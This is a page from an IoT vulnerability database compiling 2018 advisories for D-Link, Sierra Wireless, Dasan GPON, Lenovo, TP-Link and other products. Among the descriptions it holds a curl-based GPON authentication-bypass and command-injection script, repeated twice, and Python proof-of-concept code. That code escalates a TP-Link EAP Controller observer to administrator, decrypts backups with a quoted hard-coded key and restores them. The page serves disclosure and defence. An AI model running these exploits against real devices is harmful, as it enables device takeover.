VARIoT IoT vulnerabilities database

An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as an 'unset' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'unset <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782

An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'staticGet' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'staticGet <node_name attr>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782EU1.01

An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'show' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'show <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782

A vulnerability in Sierra Wireless AirLink GX400, GX440, ES440, and LS300 routers with firmware before 4.4.7 and GX450, ES450, RV50, RV50X, MP70, and MP70E routers with firmware before 4.9.3 could allow an unauthenticated remote attacker to execute arbitrary code and gain full control of an affected system, including issuing commands with root privileges. plural Sierra Wireless Router firmware contains vulnerabilities related to authorization, authority, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SierraWirelessAirLinkGX400 and others are router products of SierraWireless Canada. There are security holes in several SierraWireless products. Sierra Wireless AirLink GX400 and so on are the router products of Canadian Sierra Wireless company. The following products and versions are affected: Sierra Wireless AirLink GX400 with firmware prior to 4.4.7; Sierra Wireless AirLink GX440 with firmware prior to 4.4.7; Sierra Wireless AirLink ES440 with firmware prior to 4.4.7; Sierra Wireless AirLink LS300 with firmware prior to 4.9.3; Sierra Wireless AirLink GX450 with firmware prior to 4.9.3; Sierra Wireless AirLink ES450 with firmware prior to 4.9.3; Sierra Wireless AirLink RV50 with firmware prior to 4.9.3; Sierra Wireless AirLink RV50X with firmware prior to .3; Sierra Wireless AirLink MP70 with firmware prior to 4.9.3; Sierra Wireless AirLink MP70E with firmware prior to 4.9.3

A vulnerability in Sierra Wireless AirLink GX400, GX440, ES440, and LS300 routers with firmware before 4.4.5 and GX450, ES450, RV50, RV50X, MP70, and MP70E routers with firmware before 4.9 could allow an authenticated remote attacker to execute arbitrary code and gain full control of an affected system, including issuing commands with root privileges. This vulnerability is due to insufficient input validation on user-controlled input in an HTTP request to the targeted device. An attacker in possession of router login credentials could exploit this vulnerability by sending a crafted HTTP request to an affected system. plural Sierra Wireless Vulnerability related to input validation exists in the firmware of routers made by the manufacturer.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SierraWirelessAirLinkGX400 and others are router products of SierraWireless Canada

D-Link DIR-601 A1 1.02NA devices do not require the old password for a password change, which occurs in cleartext. D-Link DIR-601 Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-601 is a wireless router product from D-Link. A security vulnerability exists in the D-LinkDIR-601A11.02NA release, which is caused by the fact that the user does not need the current password when changing the password and the program passes the new username and password in clear text. An attacker could exploit the vulnerability to obtain information by intercepting passed parameters. There is a security vulnerability in D-Link DIR-601 A1 version 1.02NA. ------------------------------------------ [Additional Information] Insecure Authentication Practices in D-LINK DIR-601 Router, Hardware version A1, Firmware Version 1.02NA When logging into the router, the authentication module passes the username and password BASE64 encoded vice encrypted. There is also no support for HTTPS connections to the router. Due to no schedule viability D-Link asks that two items are mentioned in disclosure: a) For this out of service router, users are encouraged too used DD-WRT firmware here <http://www.dd-wrt.com/site/support/router-database> b) They can contact support@dlink.com for the latest information on updates. ------------------------------------------ [VulnerabilityType Other] Weak Authentication and No HTTPS support ------------------------------------------ [Vendor of Product] D-Link ------------------------------------------ [Affected Product Code Base] DIR 601 - Hardware A1, Firmware 1.02NA ------------------------------------------ [Affected Component] Login, Password Changing ------------------------------------------ [Attack Type] Context-dependent ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] To exploit this, an attacker must have a proxy or man-in-the-middle attack completed and be able to discern the URLs to intercept passed parameters. ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] true ------------------------------------------ [Remediation] Due to no schedule viability D-Link asks that two items are mentioned in disclosure: a) For this out of service router, users are encouraged too used DD-WRT firmware here b) They can contact support@dlink.com for the latest information on updates. ------------------------------------------ [References] http://us.dlink.com/security-advisories/ <http://us.dlink.com/security-advisories/> https://advancedpersistentsecurity.net/cve-2018-10641/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10641 Joe Gray

An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash echo "[+] Sending the Commanda| " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga

An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. Dasan GPON home routers Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the \342\200\230dest_host\342\200\231 parameter to GponForm/diag_FormURI. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash echo "[+] Sending the Commanda| " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga

An authentication weakness vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to recover user passwords on vulnerable installations due to a flaw in the DBCrypto class. An attacker must first obtain access to the user database on the target system in order to exploit this vulnerability. When storing user passwords, the process stores them in a recoverable format using a hard-coded key. An attacker can then leverage this vulnerability to decrypt existing passwords. Multiple SQL-injection vulnerabilities 2. A command-injection vulnerability 3. An insecure authentication weakness Exploiting these issues could allow an attacker to access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary command, bypass authentication mechanism, execute arbitrary code and obtain sensitive information. This may aid in further attacks

An issue was discovered in certain Apple products. Swift before 4.1.1 Security Update 2018-001 is affected. The issue involves the "Swift for Ubuntu" component. It allows attackers to execute arbitrary code in a privileged context because write and execute permissions are enabled during library loading. Apple Swift is prone to an arbitrary code-execution vulnerability. Failed attempts will likely cause a denial-of-service condition. Apple Swift is a programming language for macOS, iOS, watchOS and tvOS developed by Apple. This issue was addressed with improved permissions. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 and the Swift announcements section on the forum: https://forums.swift.org/c/general-announce This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlrsmUcpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbkbA// TuLWltNrBXakVq4NY1wBZ0P+/SYUlw312FHtWrtDcAKNykyfED9bA8AnG0Ux3d1g MdJqT9KkRLXOSunWgiXG8IpWH9KCApeWDV/AE4p6isgOzE4orx02QeHzu9zc7RN6 jBVlfJaGCpTzVuFJRiEimyupjbd5db33N8raRmLxMUKTn0jVjG6ARNS7G+rpUygE 4Dy/lwP05tLWffK1O+w0oihfGsxEl1xiNAcErHTk6Fb/ZVHiITXsuOw9E775dRsM 5fkuyVU6uyhzVNWXkJ9AhOlld7t6gBFNCADMsi+jSqT6EYCHKODBXrar0CfafrsP edAvUE6PopD2i5ee7msdB+WxTLf1J/WPqT4kyD9kD4SwPeE6eN8evTqubNsOF+jc cwhsgFuH34AvsoCea5i5v9mwLpjWodgq6OyMkF0Ee3shVx8HRo2Gm/sjj/THJq/G 76Wkfb2bOcVJ3ncDAHAHO3tWfrqZYD9+Eg5hQLwyRDpBKTBzl9R5yXQZFa0naLdC 1iEzXtom+IeXn9jYqE79qOUkBSMzZQ95j98CklKGfKMz8UtfOzM2+mmwCSx5CAwC H92XBJ7wMyg6EEgByPX89Y4oyg9Ng+reTtAQD2TC9rygEKh5LMJxlhCM+CLDWEqC ys0NCk7M9izqbAZ4zsf+D+Ml/4h71iDBae92JURjhas= =sqwr -----END PGP SIGNATURE-----

MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) In Lenovo System Update versions earlier than 5.07.0072 contains a local vulnerability where an attacker entering very large user ID or password can overrun the program's buffer, causing undefined behaviors, such as execution of arbitrary code. No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv. Lenovo System Update Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Lenovo System Update is prone to a local buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successful exploits may allow attackers to execute arbitrary code with elevated privileges. Failed exploits may result in denial-of-service conditions. Lenovo System Update is a set of system automatic update tools from Lenovo in China, which includes device driver updates, Windows system patch updates, etc. Document Title: =============== Lenovo SU v5.07 - Buffer Overflow & Code Execution Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2131 Lenovo Security ID: LEN-19625 https://nvd.nist.gov/vuln/detail/CVE-2018-9063 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9063 Acknowledgements: https://support.lenovo.com/us/fr/solutions/len-19625 News & Press References: https://www.securityweek.com/lenovo-patches-secure-boot-vulnerability-servers https://securityaffairs.co/wordpress/72335/security/lenovo-security-updates.html http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9063 CVE-ID: ======= CVE-2018-9063 Release Date: ============= 2018-07-12 Vulnerability Laboratory ID (VL-ID): ==================================== 2131 Common Vulnerability Scoring System: ==================================== 7.8 Vulnerability Class: ==================== Buffer Overflow Current Estimated Price: ======================== 4.000a! - 5.000a! Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Lenovo SU v5.7.x & v5.6.x. software. Vulnerability Disclosure Timeline: ================================== 2018-05-03: Release Date (Lenovo) 2018-07-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Lenovo Product: SU (MapDrv - mapdrv.exe) 5.7.19, 5.6.34, 5.6.0.28 & 5.6.0.27 Exploitation Technique: ======================= Local Severity Level: =============== High Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Program Technical Details & Description: ================================ A local buffer overflow and arbitrary code exeuction has been discovered in the official Lenovo SU v5.7.x & v5.6.x. software. The vulnerability allows to overwrite the active registers of the process to compromise the affected software by gaining higher system access privileges. Exploitation of the local buffer overflow vulnerability requires no user interaction and system user process privileges of the driver. Successful exploitation of the buffer overflow vulnerability results in a compromise of the local system process or affected computer system. Vulnerable Driver: [+] MapDrv Affected Process: [+] mapdrv.exe Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers with system process privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. --- Debug Error Exception Session Log (Exception) --- (d8c.1988): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=029ab7a0 ebx=0031fe05 ecx=00000041 edx=fd974860 esi=029a9d70 edi=0031fd04 eip=00a256b3 esp=0031e54c ebp=0031fc70 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 *** ERROR: Module load completed but symbols could not be loaded for image00a20000 image00a20000+0x56b3: 00a256b3 66890c02 mov word ptr [edx+eax],cx ds:0023:00320000=0000 --- Debug Session Log [Exception Analysis] --- FAULTING_IP: image00a20000+56b3 00a256b3 66890c02 mov word ptr [edx+eax],cx EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff) ExceptionAddress: 00a256b3 (image00a20000+0x000056b3) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 00320000 Attempt to write to address 00320000 FAULTING_THREAD: 00001988 PROCESS_NAME: image00a20000 FAULTING_MODULE: 77ab0000 ntdll DEBUG_FLR_IMAGE_TIMESTAMP: 594b6578 ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. WRITE_ADDRESS: 00320000 BUGCHECK_STR: ACCESS_VIOLATION IP_ON_HEAP: 00410041 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>binbuild_logstimebuildntrebase.log for module which may contain the address if it were loaded. DEFAULT_BUCKET_ID: WRONG_SYMBOLS FRAME ONE INVALID: 1800200000000a LAST_CONTROL_TRANSFER: from 00410041 to 00a256b3 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0031fc70 00410041 00410041 00410041 00410041 image00a20000+0x56b3 0031fc74 00410041 00410041 00410041 00410041 0x410041 0031fc78 00410041 00410041 00410041 00410041 0x410041 0031fc7c 00410041 00410041 00410041 00410041 0x410041 0031fc80 00410041 00410041 00410041 00410041 0x410041 0031fc84 00410041 00410041 00410041 00410041 0x410041 0031fc88 00410041 00410041 00410041 00410041 0x410041 0031fc8c 00410041 00410041 00410041 00410041 0x410041 0031fc90 00410041 00410041 00410041 00410041 0x410041 0031fc94 00410041 00410041 00410041 00410041 0x410041 0031fc98 00410041 00410041 00410041 00410041 0x410041 0031fc9c 00410041 00410041 00410041 00410041 0x410041 0031fca0 00410041 00410041 00410041 00410041 0x410041 0031fca4 00410041 00410041 00410041 00410041 0x410041 0031fca8 00410041 00410041 00410041 00410041 0x410041 0031fcac 00410041 00410041 00410041 00410041 0x410041 0031fcb0 00410041 00410041 00410041 00410041 0x410041 0031fcb4 00410041 00410041 00410041 00410041 0x410041 0031fcb8 00410041 00410041 00410041 00410041 0x410041 0031fcbc 00410041 00410041 00410041 00410041 0x410041 0031fcc0 00410041 00410041 00410041 00410041 0x410041 0031fcc4 00410041 00410041 00410041 00410041 0x410041 0031fcc8 00410041 00410041 00410041 00410041 0x410041 0031fccc 00410041 00410041 00410041 00410041 0x410041 0031fcd0 00410041 00410041 00410041 00410041 0x410041 0031fcd4 00410041 00410041 00410041 00410041 0x410041 0031fcd8 00410041 00410041 00410041 00410041 0x410041 0031fcdc 00410041 00410041 00410041 00410041 0x410041 0031fce0 00410041 00410041 00410041 00410041 0x410041 0031fce4 00410041 00410041 00410041 00410041 0x410041 0031fce8 00410041 00410041 00410041 00410041 0x410041 0031fcec 00410041 00410041 00410041 00410041 0x410041 0031fcf0 00410041 00410041 00410041 00410041 0x410041 0031fcf4 00410041 00410041 00410041 00410041 0x410041 0031fcf8 00410041 00410041 00410041 00410041 0x410041 0031fcfc 00410041 00410041 00410041 00410041 0x410041 0031fd00 00410041 00410041 00410041 00410041 0x410041 0031fd04 00410041 00410041 00410041 00410041 0x410041 0031fd08 00410041 00410041 00410041 00410041 0x410041 0031fd0c 00410041 00410041 00410041 00410041 0x410041 0031fd10 00410041 00410041 00410041 00410041 0x410041 0031fd14 00410041 00410041 00410041 00410041 0x410041 0031fd18 00410041 00410041 00410041 00410041 0x410041 0031fd1c 00410041 00410041 00410041 00410041 0x410041 0031fd20 00410041 00410041 00410041 00410041 0x410041 0031fd24 00410041 00410041 00410041 00410041 0x410041 0031fd28 00410041 00410041 00410041 00410041 0x410041 0031fd2c 00410041 00410041 00410041 00410041 0x410041 0031fd30 00410041 00410041 00410041 00410041 0x410041 0031fd34 00410041 00410041 00410041 00410041 0x410041 0031fd38 00410041 00410041 00410041 00410041 0x410041 0031fd3c 00410041 00410041 00410041 00410041 0x410041 0031fd40 00410041 00410041 00410041 00410041 0x410041 0031fd44 00410041 00410041 00410041 00410041 0x410041 0031fd48 00410041 00410041 00410041 00410041 0x410041 0031fd4c 00410041 00410041 00410041 00410041 0x410041 0031fd50 00410041 00410041 00410041 00410041 0x410041 0031fd54 00410041 00410041 00410041 00410041 0x410041 0031fd58 00410041 00410041 00410041 00410041 0x410041 0031fd5c 00410041 00410041 00410041 00410041 0x410041 0031fd60 00410041 00410041 00410041 00410041 0x410041 0031fd64 00410041 00410041 00410041 00410041 0x410041 0031fd68 00410041 00410041 00410041 00410041 0x410041 0031fd6c 00410041 00410041 00410041 00410041 0x410041 0031fd70 00410041 00410041 00410041 00410041 0x410041 0031fd74 00410041 00410041 00410041 00410041 0x410041 0031fd78 00410041 00410041 00410041 00410041 0x410041 0031fd7c 00410041 00410041 00410041 00410041 0x410041 0031fd80 00410041 00410041 00410041 00410041 0x410041 0031fd84 00410041 00410041 00410041 00410041 0x410041 0031fd88 00410041 00410041 00410041 00410041 0x410041 0031fd8c 00410041 00410041 00410041 00410041 0x410041 0031fd90 00410041 00410041 00410041 00410041 0x410041 0031fd94 00410041 00410041 00410041 00410041 0x410041 0031fd98 00410041 00410041 00410041 00410041 0x410041 PRIMARY_PROBLEM_CLASS: STACK_CORRUPTION FOLLOWUP_IP: image00a20000+56b3 00a256b3 66890c02 mov word ptr [edx+eax],cx SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner MODULE_NAME: image00a20000 IMAGE_NAME: image00a20000 SYMBOL_NAME: image00a20000+56b3 STACK_COMMAND: ~0s ; kb BUCKET_ID: WRONG_SYMBOLS Followup: MachineOwner --------- 0:000> lmvm image00a20000 start end module name 00a20000 00bd2000 image00a20000 (no symbols) Loaded symbol image file: C:Program FilesLenovoSystem Updatemapdrv.exe Image path: image00a20000 Image name: image00a20000 Timestamp: Wed Jun 21 23:36:40 2017 (594B6578) CheckSum: 001BA113 ImageSize: 001B2000 File version: 1.0.0.1 Product version: 1.0.0.1 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 1.0 App File date: 00000000.00000000 Translations: 0409.04b0 ProductName: Map Network Drive InternalName: mapdrv OriginalFilename: mapdrv.exe ProductVersion: 1, 0, 0, 1 FileVersion: 1, 0, 0, 1 FileDescription: Map Network Drive Application LegalCopyright: Copyright Lenovo 2005, 2006, all rights reserved. Copyright IBM Corporation 1996-2005, all rights reserved. Solution - Fix & Patch: ======================= Update Lenovo System Update to version 5.07.0072 or later. You can determine the currently installed version by opening Lenovo System Update, clicking on the green question mark in the top right corner and then selecting aAbout.a Lenovo System Update can be updated by choosing either of the following methods: Lenovo System Update automatically checks for a later version whenever the application is run. Click OK when prompted that a new version is available. Credits & Authors: ================== S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

A vulnerability has been identified in Siveillance VMS Video for Android (All versions < V12.1a (2018 R1)), Siveillance VMS Video for iOS (All versions < V12.1a (2018 R1)). Improper certificate validation could allow an attacker in a privileged network position to read data from and write data to the encrypted communication channel between the app and a server. The security vulnerability could be exploited by an attacker in a privileged network position which allows intercepting the communication channel between the affected app and a server (such as Man-in-the-Middle). Furthermore, an attacker must be able to generate a certificate that results for the validation algorithm in a checksum identical to a trusted certificate. Successful exploitation requires no user interaction. The vulnerability could allow reading data from and writing data to the encrypted communication channel between the app and a server, impacting the communication's confidentiality and integrity. At the time of advisory publication no public exploitation of this security vulnerability was known. Siemens confirms the security vulnerability and provides mitigations to resolve the security issue. Siemens Siveillance VMS Video for Android is a set of Android-based video management software from Siemens. The vulnerability stems from the failure of the program to properly verify the certificate. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks and bypass certain security restrictions

The web management interface in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows does not have Anti-CSRF tokens in any forms. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkEAPController and OmadaController are software used by TP-LINK to remotely control wireless AP access point devices. The vulnerability stems from the fact that the program does not have any form of anti-cross-site request forgery token. A privilege-escalation vulnerability 2. A hard-coded cryptographic key vulnerability 3. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Due to the use of a hard-coded cryptographic key the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. On 7.2 we show the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing such key, and knowing the encryption algorithm would allow the backup file to be decrypted and modified. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5). 7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. 7.2.**Download, Decrypt and Restore the web app backup file** [CVE-2018-10167] As described, the whole Web API do not restrict low privilege users, so an observer can make a request to download the web app backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server. /----- # -*- coding: utf-8 -*- import requests import codecs key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \ "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX" def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id} #get backup file get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False) #decrypt backup file decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key) #modify decrypted backup file patched_backup = decrypted_backup.replace('normaluser', 'attacker') #encrypt the file and save it path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; 